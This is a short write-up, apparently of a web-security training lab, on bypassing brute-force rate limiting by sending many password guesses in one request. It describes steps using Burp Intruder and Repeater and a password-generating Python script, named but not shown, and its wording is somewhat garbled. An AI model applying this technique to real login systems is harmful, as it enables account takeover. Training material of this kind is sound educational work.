Broken Brute-Force Protection: How to Bypass Rate Limiting in a Single Request

The Broken brute-force protection, multiple credentials per request lab demonstrates a security flaw in the authentication mechanism that is designed to show how an attacker can bypass weak brute-force protection by sending a number of credential attempts in a single request.
The target of this lab is to find a way to brute-force Carlos’s password and log in to his account for whichvictim’s username is carlos.
The attacker can identify the password parameter, replace its value with $$ inorder to perform a password spraying with Burp Intruder right-click on the request and send it to Intruder, and paste the candidate passwords.
The server usually responds with rate limiting; the attacker can perform the same action using the following Python script import sys, def read_passwords (file_path), and def main ().
Save the script as gen_pass.py, save the password list as passlist.txt, paste the generated passwords into Burp Repeater, and observe the server response.
If successful, the server responds with HTTP 302, indicating that the rate limit bypass was successful, and sensitive user data may be compromised.

Fast Feed